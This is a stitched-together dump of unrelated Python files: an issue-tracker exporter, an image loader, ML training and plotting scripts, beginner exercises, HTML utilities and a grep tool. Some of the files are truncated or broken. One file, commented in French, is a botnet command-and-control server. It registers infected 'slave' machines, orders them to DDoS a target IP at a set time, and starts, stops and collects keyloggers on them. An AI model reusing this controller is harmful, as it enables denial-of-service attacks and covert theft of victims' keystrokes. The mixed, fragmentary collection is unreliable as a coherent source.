- Comment User is called an Author
"""
import argparse
import json
import sys
import issues
def _getKind(kind):
mapping = {
"defect": "bug",
"enhancement": "enhancement",
"task": "task",
"review": "proposal",
"other": "bug",
}
return mapping.get(kind.lower(), "bug")
def _getPriority(priority):
mapping = {
"low": "trivial",
"medium": "minor",
"high": "major",
"critical": "critical",
}
return mapping.get(priority.lower(), "minor")
def _getStatus(status):
mapping = {
"new": "new",
"fixed": "resolved",
"invalid": "invalid",
"duplicate": "duplicate",
"wontfix": "wontfix",
}
return mapping.get(status.lower(), "new")
def _getTitle(title):
if len(title) < 255:
return title
return title[:250] + "[...]"
class UserService(issues.UserService):
"""BitBucket user operations.
"""
def IsUser(self, username):
"""Returns wheter a username is a valid user.
BitBucket does not have a user api, so accept all usernames.
"""
return True
class IssueService(issues.IssueService):
"""Abstract issue operations.
Handles creating and updating issues and comments on an user API.
"""
def __init__(self):
self._bitbucket_issues = []
self._bitbucket_comments = []
def GetIssues(self, state="open"):
"""Gets all of the issue for the repository.
Since BitBucket does not have an issue API, always returns an empty list.
Args:
state: The state of the repository can be either 'open' or 'closed'.
Returns:
An empty list.
"""
return []
def CreateIssue(self, googlecode_issue):
"""Creates an issue.
Args:
googlecode_issue: An instance of GoogleCodeIssue
Returns:
The issue number of the new issue.
Raises:
ServiceError: An error occurred creating the issue.
"""
bitbucket_issue = {
"assignee": googlecode_issue.GetOwner(),
"content": googlecode_issue.GetDescription(),
"content_updated_on": googlecode_issue.GetContentUpdatedOn(),
"created_on": googlecode_issue.GetCreatedOn(),
"id": googlecode_issue.GetId(),
"kind": _getKind(googlecode_issue.GetKind()),
"priority": _getPriority(googlecode_issue.GetPriority()),
"reporter": googlecode_issue.GetAuthor(),
"status": _getStatus(googlecode_issue.GetStatus()),
"title": _getTitle(googlecode_issue.GetTitle()),
"updated_on": googlecode_issue.GetUpdatedOn()
}
self._bitbucket_issues.append(bitbucket_issue)
return googlecode_issue.GetId()
def CloseIssue(self, issue_number):
"""Closes an issue.
Args:
issue_number: The issue number.
"""
def CreateComment(self, issue_number, googlecode_comment):
"""Creates a comment on an issue.
Args:
issue_number: The issue number.
googlecode_comment: An instance of GoogleCodeComment
"""
bitbucket_comment = {
"content": googlecode_comment.GetDescription(),
"created_on": googlecode_comment.GetCreatedOn(),
"id": googlecode_comment.GetId(),
"issue": googlecode_comment.GetIssue().GetId(),
"updated_on": googlecode_comment.GetUpdatedOn(),
"user": googlecode_comment.GetAuthor()
}
self._bitbucket_comments.append(bitbucket_comment)
def WriteIssueData(self, default_issue_kind):
"""Writes out the json issue and comments data to db-1.0.json.
"""
issues_data = {
"issues": self._bitbucket_issues,
"comments": self._bitbucket_comments,
"meta": {
"default_kind": default_issue_kind
}
}
with open("db-1.0.json", "w") as issues_file:
issues_json = json.dumps(issues_data, sort_keys=True, indent=4,
separators=(",", ": "))
issues_file.write(issues_json)
def ExportIssues(issue_file_path, project_name,
user_file_path, default_issue_kind):
"""Exports all issues for a given project.
"""
issue_service = IssueService()
user_service = UserService()
issue_data = issues.LoadIssueData(issue_file_path, project_name)
user_map = issues.LoadUserData(user_file_path, user_service)
issue_exporter = issues.IssueExporter(
issue_service, user_service, issue_data, project_name, user_map)
try:
issue_exporter.Init()
issue_exporter.Start()
issue_service.WriteIssueData(default_issue_kind)
print "\nDone!\n"
except IOError, e:
print "[IOError] ERROR: %s" % e
except issues.InvalidUserError, e:
print "[InvalidUserError] ERROR: %s" % e
def main(args):
"""The main function.
Args:
args: The command line arguments.
Raises:
ProjectNotFoundError: The user passed in an invalid project name.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--issue_file_path", required=True,
help="The path to the file containing the issues from"
"Google Code.")
parser.add_argument("--project_name", required=True,
help="The name of the Google Code project you wish to"
"export")
parser.add_argument("--user_file_path", required=False,
help="The path to the file containing a mapping from"
"email address to bitbucket username")
parser.add_argument("--default_issue_kind", required=False,
help="A non-null string containing one of the following"
"values: bug, enhancement, proposal, task. Defaults to"
"bug")
parsed_args, _ = parser.parse_known_args(args)
# Default value.
if not parsed_args.default_issue_kind:
print "Using default issue kind of 'bug'."
parsed_args.default_issue_kind = "bug"
ExportIssues(
parsed_args.issue_file_path, parsed_args.project_name,
parsed_args.user_file_path, parsed_args.default_issue_kind)
if __name__ == "__main__":
main(sys.argv)
|
"""ChunkedImageLoader class.
This is for pre-Octree Image class only.
"""
import logging
from typing import Optional
from napari.layers.image._image_loader import ImageLoader
from napari.layers.image.experimental._chunked_slice_data import (
ChunkedSliceData,
)
from napari.layers.image.experimental._image_location import ImageLocation
LOGGER = logging.getLogger("napari.loader")
class ChunkedImageLoader(ImageLoader):
"""Load images using the Chunkloader: synchronously or asynchronously.
Attributes
----------
_current : Optional[ImageLocation]
The location we are currently loading or showing.
"""
def __init__(self) -> None:
# We're showing nothing to start.
self._current: Optional[ImageLocation] = None
def load(self, data: ChunkedSliceData) -> bool:
"""Load this ChunkedSliceData (sync or async).
Parameters
----------
data : ChunkedSliceData
The data to load
Returns
-------
bool
True if load happened synchronously.
"""
location = ImageLocation(data.layer, data.indices)
LOGGER.debug("ChunkedImageLoader.load")
if self._current is not None and self._current == location:
# We are already showing this slice, or its being loaded
# asynchronously.
return False
# Now "showing" this slice, even if it hasn't loaded yet.
self._current = location
if data.load_chunks():
return True # Load was sync, load is done.
return False # Load was async, so not loaded yet.
def match(self, data: ChunkedSliceData) -> bool:
"""Return True if slice data matches what we are loading.
Parameters
----------
data : ChunkedSliceData
Does this data match what we are loading?
Returns
-------
bool
Return True if data matches.
"""
location = data.request.location
if self._current == location:
LOGGER.debug("ChunkedImageLoader.match: accept %s", location)
return True
# Data was for a slice we are no longer looking at.
LOGGER.debug("ChunkedImageLoader.match: reject %s", location)
return False
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
variable = 7
if variable > 10:
print "La variable es mayor que diez"
elif variable < 7:
print "La variable es menor que siete"
else:
print "La variable es siete"
print "Esto se muestra siempre"
|
from bsm.util import ensure_list
def _build_steps(cfg):
cfg['build'] = ensure_list(cfg['build'])
try:
make_index = cfg['build'].index('make')
except ValueError:
return
build_step_number = len(cfg['build'])
if make_index > 0 and 'configure' not in cfg['install']:
cfg['install']['configure'] = cfg['build'][make_index-1]
if 'compile' not in cfg['install']:
cfg['install']['compile'] = 'make'
if make_index+1 < build_step_number and 'install' not in cfg['install']:
cfg['install']['install'] = cfg['build'][make_index+1]
def run(param, cfg):
cfg.setdefault('install', {})
if 'source' in cfg and cfg['install'].get('download') == 'http':
if 'main' in cfg['source']:
cfg['install'].setdefault('extract', 'tar')
if 'patch' in cfg:
cfg['install'].setdefault('patch', 'patch')
if 'build' in cfg:
_build_steps(cfg)
if param['category'] == 'cepcsoft' and 'cmake' in cfg.get('build', {}):
cfg.setdefault('cmake', {})
cfg['cmake']['ignore_install_prefix'] = True
cfg['cmake'].setdefault('var', {})
cfg['cmake']['var']['CMAKE_BUILD_TYPE'] = 'RelWithDebInfo'
cfg['cmake']['var']['BUILD_32BIT_COMPATIBLE'] = 'OFF'
cfg['cmake']['var']['INSTALL_DOC'] = 'OFF'
cfg['install'].setdefault('clean', 'clean')
cfg.setdefault('clean', ['build', 'download', 'log'])
|
# if n is a positive integer, n! = n(n-1)(n-2)...(3)(2)(1). The product of all positive integers less than or equal to n
# 0! = 1
def factorial(n):
if n < 0:
return('{} is not a positive integer '.format(n))
elif n >= 1:
return(n * factorial(n-1))
else:
return(1)
print(factorial(4))
print(4*3*2*1)
print(factorial(0))
print(factorial(-1))
|
# -*- coding: utf-8 -*-
"""
Main script to train and export GPR Forward models for the Ogden Material
"""
import numpy as np
from random import seed
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from time import time
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF
import PreProcess
import PostProcess
# Metamodel settings
NUM_FEATURES = 2
NUM_OUTPUT = 100
L_ScaleBound = 1e-13
U_ScaleBound = 1e+5
# Training and testing data (number of FEBio simulations)
num_train_list = [50,75,100,250,500, 750,1000, 1500, 2000, 2500, 3000]
valid_sets = list(range(10001,11001))
n_val = len(valid_sets)
star_set = 249 # The ID of one validation test to visualize stress-strain
# Reproduce
np.random.seed(1234)
seed(1234)
# Initialize learning curve dictionary
lc_stats = {'num_train':[], 'train_time':[],'MAE_train': [], 'MAPE_train': [], 'R2_train': [],'MAE_val': [], 'MAPE_val': [], 'R2_val': [] }
# Load data
TestData = PreProcess.OgdenData()
StrainObservs = TestData.FEBio_strain # As is, use all available points
# Separate Validation data
X_val, Y_val = TestData.FE_in_out(valid_sets, strain_vals = StrainObservs )
# Loop Training sets
for kk in range(0, len(num_train_list)):
# Separate Training set
train_num = num_train_list[kk]
print(f'TRAIN_n...{train_num+0:03}')
train_sets = list(range(1, train_num + 1))
X_train, Y_train = TestData.FE_in_out(train_sets, strain_vals = StrainObservs)
# Scale Training Set
scaler = StandardScaler()
scaler.fit(X_train)
# Scale Input Sets
X_train_scaled = scaler.transform(X_train)
X_val_scaled = scaler.transform(X_val)
####### GPR Model ##################
length_scales = np.ones(2)
lscale_bounds = (L_ScaleBound, U_ScaleBound)
kernel = RBF(length_scales,length_scale_bounds = lscale_bounds) #Matern(length_scales)
model = GaussianProcessRegressor(kernel=kernel, alpha=1e-8, random_state=None,n_restarts_optimizer=10)
# Train, fit model
start = time()
model.fit(X_train_scaled, Y_train)
# Find predictions
fX_train = model.predict(X_train_scaled)
fX_val = model.predict(X_val_scaled)
# Calcutate train and evaltime
end = time()
run_time = (end - start)/60
print('\t run time in mins.....%.2f' %(run_time))
# Initialize utils for post processing
export = PostProcess.ExportData('Ogden', 'GPR_Tuned'+ str(train_num))
# Export total errors after training
lc_stats['num_train'].append(train_num)
lc_stats['train_time'].append(run_time)
lc_stats = export.compute_error(Y_train, fX_train, lc_stats, 'train')
lc_stats = export.compute_error(Y_val, fX_val, lc_stats, 'val')
export.dict_to_csv(lc_stats,'LC')
# Plot star set
fig, (ax1, ax2) = plt.subplots(2,1,figsize=(5,8))
export.stress_strain(Y_val, fX_val, None, lc_stats['MAE_val'][-1] , StrainObservs, star_set, ax1, ax2)
# Plot stress scattered data
R2 = 1-lc_stats['R2_val'][-1]
export.stress_scatter(Y_val,fX_val, R2)
# Export trained models
export.trained_GPRs(scaler, model, train_num, lscale_bounds)
plt.close('all')
# Plot Learning curve
export.learning_curve(num_train_list,lc_stats['MAE_train'],lc_stats['MAE_val'],'MAE')
export.learning_curve(num_train_list,lc_stats['MAPE_train'],lc_stats['MAPE_val'],'MAPE')
export.learning_curve(num_train_list,lc_stats['R2_train'],lc_stats['R2_val'],'R2')
|
from PyQt5.QtSql import QSqlDatabase, QSqlQueryModel, QSqlQuery
from PyQt5.QWidgets import QTableView, QApplication
import sys
|
# as_util_html.py written by Duncan Murray 7/8/2013 (C) Acute Software
# utility functions for HTML work, mainly from udacity course
import csv
try:
import urllib.request as request
except:
import urllib2 as request
import getpass
import socket
def main():
TEST()
def TEST():
print(" \n --- Testing Net functions --- ")
print(" ------------------------------ ")
print(escape_html("hi there"))
print(escape_html("hi <t>here"))
print('downloading file http://gdeltproject.org/data/lookups/CAMEO.country.txt to test_country.txt')
DownloadFile('http://gdeltproject.org/data/lookups/CAMEO.country.txt', 'test_country.txt')
print('done')
def GetUserName():
return getpass.getuser()
def GetHostName():
return socket.gethostname()
def DownloadFile(url, filename):
output = open(filename,'wb')
output.write(request.urlopen(url).read())
output.close()
def CreateCssString(fontFamily, baseFontSize, linefeed='\n'):
css = "<STYLE>" + linefeed
css = css + "BODY { font-size:" + baseFontSize + "; FONT-FAMILY:" + fontFamily + "; }" + linefeed
css = css + "A:link { font-size:" + baseFontSize + "; COLOR: blue;TEXT-DECORATION:none}" + linefeed
css = css + "A:visited { color: #003399; font-size:" + baseFontSize + ";TEXT-DECORATION:none }" + linefeed
css = css + "A:hover { color:#FF3300;TEXT-DECORATION:underline}" + linefeed
css = css + "TD { font-size:" + baseFontSize + "; valign=top; FONT-FAMILY:Arial; padding: 1px 2px 2px 1px; }" + linefeed
css = css + "H1 { font-size:200%; padding: 1px 0px 0px 0px; margin:0px; }" + linefeed
css = css + "H2 { font-size:160%; FONT-WEIGHT:NORMAL; margin:0px 0px 0px 0px; padding:0px; }" + linefeed
css = css + "H3 { font-size:100%; FONT-WEIGHT:BOLD; padding:1px; letter-spacing:0.1em; }" + linefeed
css = css + "H4 { font-size:140%; FONT-WEIGHT:NORMAL; margin:0px 0px 0px 0px; padding:1px; }" + linefeed
css = css + "</STYLE>" + linefeed
return css
def escape_html(s):
res = s
res = res.replace('&', "&")
res = res.replace('>', ">")
res = res.replace('<', "<")
res = res.replace('"', """)
return res
def BuildHTMLHeader(title, linefeed='\n', border='1'):
res = "<HTML><HEAD><title>" + linefeed
res = res + title + "</title>" + linefeed
#res = res + "<link rel=\"stylesheet\" type=\"text/css\" href=\"" + linefeed
res = res + CreateCssString("Arial", "10pt", linefeed ) + linefeed
# res = res + "\" /></HEAD><BODY><H1>"
res = res + "</HEAD><BODY><H1>"
res = res + title + "</H1><TABLE border=" + border + ">"
return res
def FormatListAsHTMLTableRow(lst):
txt = '<TR>'
for i in lst:
txt = txt + '<TD>' + i + '</TD>'
txt = txt + '</TR>'
print(lst)
print('txt = ' + txt)
return txt
def FormatCsvAsHtml(csvFile, opHTML):
fop = open(opHTML, 'w')
fop.write(BuildHTMLHeader(csvFile))
with open(csvFile) as csv_file:
for row in csv.reader(csv_file, delimiter=','):
fop.write("<TR>")
for col in row:
fop.write("<TD>")
fop.write(col)
fop.write("</TD>")
fop.write("</TR>")
fop.write("</TABLE>")
fop.write("</BODY></HTML>")
fop.close()
def DisplayImagesAsHTML(imageList):
pass
if __name__ == '__main__':
main()
|
#!/usr/bin/python
"""
Starter code for the evaluation mini-project.
Start by copying your trained/tested POI identifier from
that which you built in the validation mini-project.
This is the second step toward building your POI identifier!
Start by loading/formatting the data...
"""
import pickle
import sys
sys.path.append("../tools/")
from feature_format import featureFormat, targetFeatureSplit
data_dict = pickle.load(open("../final_project/final_project_dataset.pkl", "r") )
### add more features to features_list!
features_list = ["poi", "salary"]
data = featureFormat(data_dict, features_list)
labels, features = targetFeatureSplit(data)
### your code goes here
from sklearn.cross_validation import train_test_split
from sklearn import tree
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
features_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.30, random_state=42)
clf = tree.DecisionTreeClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
acc = round(accuracy_score(labels_test, pred), 5)
print "Accuracy:", acc
poi = 0
for ii in labels_test:
if ii == 1:
poi += 1
print "POIs=", poi
tpos = 0
for n in range(len(pred)):
if pred[n] == 1 and labels_test[n] == 1:
tpos += 1
print "True Positive:", tpos
print "Presicion:", precision_score(labels_test, pred)
print "Recall:", recall_score(labels_test, pred)
print f1_score(labels_test, pred)
predictions = [0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1]
true_labels = [0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0]
for n in range(len(predictions)):
if predictions[n] == 0 and true_labels[n] == 0:
tpos += 1
print "True Positive TEST:", tpos
print "Presicion TEST:", precision_score(true_labels, predictions)
print "Recall TEST:", recall_score(true_labels, predictions)
print f1_score(true_labels, predictions)
|
# Generated by Django 2.1.7 on 2019-02-26 13:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0005_passenger'),
]
operations = [
migrations.RenameField(
model_name='passenger',
old_name='ticket_class',
new_name='pclass',
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 16-12-4 下午8:52
# @Author : sadscv
# @File : chunkFreatures.py
def npchunk_features(sentence, i, history):
"""
特征抽取器
:param sentence:(word,tag)
:param i: int, 当前sentence第i个词
:param history: i前所有的tag(chunk)
:return:{"pos":pos}
"""
word, pos = sentence[i]
return {"pos": pos}
def npchunk_features_with_prevword_and_prevpos(sentence, i, history):
"""
在npchunk_feature的基础上添加word, prevpos两个特征。
:param sentence:
:param i:
:param history:
:return:
"""
word, pos = sentence[i]
if i == 0:
prevword, prevpos = "<START>", "<START>"
else:
prevword, prevpos = sentence[i-1]
return {"pos":pos, "word":word, "prevpos":prevpos}
def tags_since_dt(sentence, i):
"""
:param sentence:(word,tag)
:param i: int, 当前sentence第i个词
:return:i前一个定冠词到i之后的pos.
例如 he is the little lovely boy.NN, DT,( JJ, JJ, NN)则返扩号中的内容。
"""
tags = set()
#对于i之前的每个(word,pos)
for word, pos in sentence[:i]:
#如果pos是‘DT’,则将tags清空。否则添加当前pos.
if pos =='DT':
tags = set()
else:
tags.add(pos)
return ('+'.join(sorted(tags)))
def npchunk_features_ultimate(sentence, i, history):
word, pos = sentence[i]
if i == 0:
prevword, prevpos = "<START>", "<START>"
else:
prevword, prevpos = sentence[i-1]
if i == len(sentence)-1:
nextword, nextpos = "<END>", "<END>"
else:
nextword, nextpos = sentence[i+1]
return {
"pos" : pos,
"word" : word,
"prevpos" : prevpos,
"nextpos" : nextpos,
"tags-since-dt" : tags_since_dt(sentence, i),
# "prevpos+pos": "%s+%s" % (prevpos, pos),
# "pos+nextpos": "%s+%s" % (pos, nextpos),
}
|
import numpy as np
import csv
import matplotlib.pyplot as plt
path1='./training_log_cnn_pretrain.csv'
with open(path1,'r') as f:
reader1 = csv.reader(f)
datas1 = [[row[0],row[1],row[2],row[3],row[4]] for row in reader1]
datas1=np.array(datas1[1:31],dtype=np.float32)
path2='./training_log_cnn_custom.csv'
with open(path2,'r') as f:
reader2 = csv.reader(f)
datas2 = [[row[0],row[1],row[2],row[3],row[4]] for row in reader2]
datas2=np.array(datas2[1:31],dtype=np.float32)
x = np.array(range(1,31))
plt.figure()
plt.rcParams["font.family"] = "Arial"
lw=1.5
ax1 = plt.subplot(2,1,1)
plt.plot(x, datas1[:,0], color='darkorange',
linewidth=lw, label='Anomaly accuracy = %0.2f' % 0.88)
plt.plot(x, datas1[:,1], color='blue',
linewidth=lw, label='Anomaly precision = %0.2f' % 0.85)
plt.plot(x, datas1[:,2], color='red',
linewidth=lw, label='Anomaly recall = %0.2f' % 0.84)
plt.plot(x, datas1[:,3], color='black',
linewidth=lw, label='Anomaly F1_score = %0.2f' % 0.84)
plt.plot(x, datas1[:,4], color='green',
linewidth=lw, label='Pattern accuracy = %0.2f' % 0.96)
plt.xlim([1, 31])
plt.ylim([0.3, 1.0])
plt.xlabel('Number of epoch')
plt.ylabel('Evaluation metrics')
plt.legend(loc="lower right")
ax = plt.gca()
#ax.set_aspect(1)
bwith=1.5
ax.spines['bottom'].set_linewidth(bwith)
ax.spines['left'].set_linewidth(bwith)
ax.spines['top'].set_linewidth(bwith)
ax.spines['right'].set_linewidth(bwith)
ax2 = plt.subplot(2,1,2)
plt.plot(x, datas2[:,0], color='darkorange',
linewidth=lw, label='Anomaly accuracy = %0.2f' % 0.85)
plt.plot(x, datas2[:,1], color='blue',
linewidth=lw, label='Anomaly precision = %0.2f' % 0.81)
plt.plot(x, datas2[:,2], color='red',
linewidth=lw, label='Anomaly recall = %0.2f' % 0.79)
plt.plot(x, datas2[:,3], color='black',
linewidth=lw, label='Anomaly F1_score = %0.2f' % 0.80)
plt.plot(x, datas2[:,4], color='green',
linewidth=lw, label='Pattern accuracy = %0.2f' % 0.94)
plt.xlim([1, 31])
plt.ylim([0.3, 1.0])
plt.xlabel('Number of epoch')
plt.ylabel('Evaluation metrics')
plt.legend(loc="lower right")
ax = plt.gca()
#ax.set_aspect(1)
bwith=1.5
ax.spines['bottom'].set_linewidth(bwith)
ax.spines['left'].set_linewidth(bwith)
ax.spines['top'].set_linewidth(bwith)
ax.spines['right'].set_linewidth(bwith)
plt.show()
|
class RaCRohaCentral:
president = "Rtr. Akash Rumade"
secretary = "Rtr. Satyen Deshpande"
treasurer = "Rtr. Yash Shinde"
class Avenue(RaCRohaCentral):
def display(self):
print(f"Roha Central has 4 avenue - PDD, CSD, CMD, ISD, president is {self.president}")
president = "Rtr. Yash Shinde"
a = Avenue()
a.display()
print(a.president)
|
#importation du module socket afin de permetttre une communication réseau
#importation d'argparse afin de pouvoir créer des argument
#importation de threading, afin d'allouer des processus à différentes action
#importation de time afin de créer des pauses lors de certaines action
import socket as modSocket
import argparse
import threading
import time
lock = threading.Lock()
"""
creation de l'objet Connexion, composé de 9 champs et 2 méthodes
1ère methode : elle va permettre d'écouter sur un port donné, et enregistrera les ip des machines connecté pendant l'écoute
dans un fichier "ListeIP.txt", une fois terminé elle vas faire appelle à la méthode receive situé dans le même objet.
2ème methode : elle va permettre de se connecter à plusieurs machines, grace à leur ip enregistrés dans le fichier "ListeIP.txt"
une fois terminer elle va lancer l'interface choix, qui vas nous affciher les menus des actions.
Ces 2 méthodes sont allouer à un processus chacun
"""
class Connexion():
def __init__(self, adresseMachine, carteReseauEcoute, listeIP, port, fichier, chemin, ip, date, clients, nbLine):
self.adresseMachine = adresseMachine
self.carteReseauEcoute = carteReseauEcoute
self.listeIP = listeIP
self.port = port
self.fichier = fichier
self.chemin = chemin
self.ip = ip
self.date = date
self.clients = clients
self.nbLine = nbLine
def listen(self, carteReseauEcoute, port, fichier, clients, date, nbLine):
carteReseauEcoute.bind(("", port))
carteReseauEcoute.listen()
while True:
print("Attente de connexion")
connReseau, addr = carteReseauEcoute.accept()
connReseau.recv(1024)
listeIP.append(addr[0])
clients.append(connReseau)
i = 0
print(listeIP)
print ("L'IP du slave est : ", listeIP[i])
i+=1
fichier.write(str(listeIP))
fichier.seek(0)
time.sleep(2)
essai = threading.Thread(target=objetChoixAction.choix, args=(connReseau, ))
essai.start()
def choix(self, connReseau):
#petit choix multiple afin de savoir quelle methode on doit lancer
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
while select != 5:
#on essaie le choix multiple
try:
if select == 1:
lock.acquire()
date = input("date pour le ddos, format(yyyy-mm-jj hh:mm) : ")
#lance la methode ddos de l'objet choixAction
objetChoixAction.ddos(connReseau, ip, date)
lock.release()
#redemande ce que l'on veut faire jusqu'a ce qu'on tape fin
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
elif select == 2:
#lance la methode start de l'objet choixAction
objetChoixAction.start_log(listeIP, connReseau)
#redemande ce que l'on veut faire jusqu'a ce qu'on tape fin
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
elif select == 3:
#lance la methode stop de l'objet choixAction
objetChoixAction.stop_log(connReseau)
#redemande ce que l'on veut faire jusqu'a ce qu'on tape fin
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
elif select == 4:
nbLine = input("Combien de ligne voulez vous pour le get_log : ")
#lance la methode get de l'objet choixAction
objetChoixAction.get_log(connReseau, chemin, nbLine)
#redemande ce que l'on veut faire jusqu'a ce qu'on tape fin
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
#si la connexion est arretée par le client pendant le choix multiple, il affichera le message ci dessous
except ConnectionAbortedError:
print("connexion arretée par le client")
for add in clients:
print("Fin du programme")
fichier.close()
carteReseauEcoute.close()
add.send("FIN".encode("utf-8"))
pass
def start_log(self, listeIP, connReseau):
print("Choix d'attaque : Keylogger. Signal envoyé")
#envoie "keylogger" au client
for add in self.clients:
add.send("keylogger".encode("utf-8"))
def ddos(self, connReseau, ip, date):
#idem
print("Choix d'attaque : DDoS. Signal envoyé")
#demande a l'utilsateur la date pour le ddosa vec un format établi
#envoie "ddos" au client
for add in self.clients:
add.send("ddos".encode("utf-8"))
#envoie ce qui est contenu dans la variable date
add.send(date.encode("utf-8"))
#pause de 20 milli seconde
time.sleep(0.2)
#et on envoie enfin la variable ip(entré dans l'argparse)
add.send(ip.encode("utf-8"))
def stop_log(self, connReseau):
print("Choix d'attaque : stop keylogger. Signal envoyé")
#envoie "stop" au client
for add in self.clients:
add.send("stop".encode("utf-8"))
message = add.recv(1024).decode("utf-8")
if message == "logger arreté":
print(message)
else:
print(message)
def get_log(self, connReseau, chemin, nbLine):
print("Choix d'attaque : Logger transfert du logger. Signal envoyé")
#envoie "transfert" au client
for add in self.clients:
add.send("transfert".encode("utf-8"))
#on demande le nombre de ligne que l'on veut pour le transfert
#on envoie la variable nbLine
add.send(nbLine.encode("utf-8"))
#on ouvre le fichier chemin(variable entré dans l'argparse) que l'on met dans la variable fichier
fichier = open(chemin, "wb")
#on reçoit les infos du keylogger
l = add.recv(1024)
print("salut")
#on écris ces infos dans la variable fichier
fichier.write(l)
#on initie les différents champs présents dans l'objet Connexion
fichier = open("ListeIP.txt", "a")
listeIP = []
chemin = ""
ip= ""
date = ""
clients = []
port = ""
nbLine = ""
adresseMachine = ("localhost", 5000)
#carte reseau qui va nous servire pour la première méthode de l'objet Connexion
carteReseauEcoute = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
#on assigne l'objet choixAction qui est l'enfant de l'objet Connexion à la variable objetChoixAction
objetChoixAction = Connexion(adresseMachine, carteReseauEcoute, listeIP, port, fichier, chemin, ip, date, clients, nbLine)
#initiation d'argparse avec les arguments
parser = argparse.ArgumentParser()
#creation de la commande --listen
parser.add_argument("--listen", type=int,
help="Ecoute sur un port donné et liste les IP connectées, pour le lancer il faut mettre le n° du port")
#creation de la commande --upload
parser.add_argument("--upload", type=str,
help="upload le fichier du keylogger, il faut entrez le chemin du fichier" )
#creation de la commande --ip
parser.add_argument("--ip", type=str,
help="envoie des paquets ipv4 sur une adresse donné, pour le lancer suffit de mettre l'ip du serveur a ddos")
parser.add_argument("--conn", type=int,
help="se connecte sur un port donné et liste les IP connectées")
#on initie la variable args, qui va contenire les arguments
args = parser.parse_args()
#si --listen est entré on executera ce qui est entrer
if args.listen:
#on entre la variable chemin qui va prendre l'argument entrer lors de la commande --upload
chemin = args.upload
print(chemin)
#on entre la variable ip qui va prendre l'argument entrer lors de la commande --ip
ip = args.ip
print(ip)
#on entre la variable port qui va prendre l'argument entrer lors de la commande --listen
port = args.listen
print(port)
#on lance la première methode de l'objet Connexion en lui allouant un thread
objetChoixAction.listen(carteReseauEcoute, port, fichier, clients, nbLine, date)
|
import gzip
with gzip.open('somefile.gz', 'rt') as f:
text = f.read()
with gzip.open('somefile.gz', 'wt') as f:
f.write('text')
import bz2
with bz2.open('somefile.bz2', 'rt') as f:
text = f.read()
with bz2.open('somefile.bz2', 'wt') as f:
f.write('text')
with gzip.open('somefile.gz', 'wt', compresslevel=5) as f:
f.write('texts')
f = open('somefile.gz', 'rb')
with gzip.open('f', 'rt') as g:
text = g.read()
|
import os
import re
import sys
import getopt
class Greper:
"""
A greper for any platform.
"""
params_dict = {}
path_list = []
search_pattern = ''
search_pattern_cmp = None
def __init__(self):
"""
"""
pass
def grep(self):
"""
- 'params': a dict containing all parameters
"""
for path in self.path_list:
for root, dirs, files in os.walk(path):
for f in files:
p = os.path.join(root, f)
self.print_file(p)
def print_file(self, path):
"""
- `path`:
"""
line_number = 0
file_content = ''
print_content = ''
try:
f = open(path, 'r')
file_content = f.readlines()
except:
pass
finally:
f.close()
for line in file_content:
line_number += 1
if self.need_to_print_line(line):
print_content += ' ' + '< ' + str(line_number) + ' > ' + line
if not print_content == '':
print(path)
print(print_content, end='')
f.close()
def need_to_print_line(self, line):
"""
"""
return re.search(self.search_pattern_cmp, line)
def set_params(self, params):
"""
- `params`: a dict containing all parameters
"""
self.params_dict = params
self.path_list = self.params_dict['path_list']
self.search_pattern = self.params_dict['search_pattern']
self.search_pattern_cmp = re.compile(self.search_pattern)
def dump(self):
"""
dump all parameters.
"""
p = ''
for (k, v) in self.params_dict.items():
p += ' dump parameters>> ' + str(k) + ' : ' + str(v) + '\n'
print(p, end='')
def get_options():
"""
deal with cmdline options.
"""
pass
if __name__ == '__main__':
params = {
'path_list' : ['E:/git/github/emacs'],
'search_pattern' : 'requ+',
}
# print(str(params))
greper = Greper()
greper.set_params(params)
greper.grep()
# greper.dump()
|
#!/usr/bin/python3
"""interface implemented by all heap variants"""
class PairingHeapInterface:
def __init__(self):
self.count = 0
def make_heap(self):
pass
def find_min(self):
pass
def insert(self, node):
pass
def delete_min(self):
pass
def merge(self, heap2):
pass
def delete(self, node):
pass
def pointer_updates(self):
pass
|
import tensorrt as trt
import pycuda.driver as cuda
import numpy as np
import torch
import pycuda.autoinit
import dataset
import model
import time
# print(dir(trt))
tensorrt_file_name = 'bert.plan'
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
trt_runtime = trt.Runtime(TRT_LOGGER)
with open(tensorrt_file_name, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
context = engine.create_execution_context()
# class HostDeviceMem(object):
# def __init__(self, host_mem, device_mem):
# self.host = host_mem
# self.device = device_mem
# def __str__(self):
# return "Host:\n" + str(self.host) + "\nDevice:\n" + str(self.device)
# def __repr__(self):
# return self.__str__()
# inputs, outputs, bindings, stream = [], [], [], []
# for binding in engine:
# size = trt.volume(engine.get_binding_shape(binding)) * engine.max_batch_size
# dtype = trt.nptype(engine.get_binding_dtype(binding))
# host_mem = cuda.pagelocked_empty(size, dtype)
# device_mem = cuda.mem_alloc(host_mem.nbytes)
# bindings.append(int(device_mem))
# if engine.binding_is_input(binding):
# inputs.append( HostDeviceMem(host_mem, device_mem) )
# else:
# outputs.append(HostDeviceMem(host_mem, device_mem))
# input_ids = np.ones([1, 1, 29, 29])
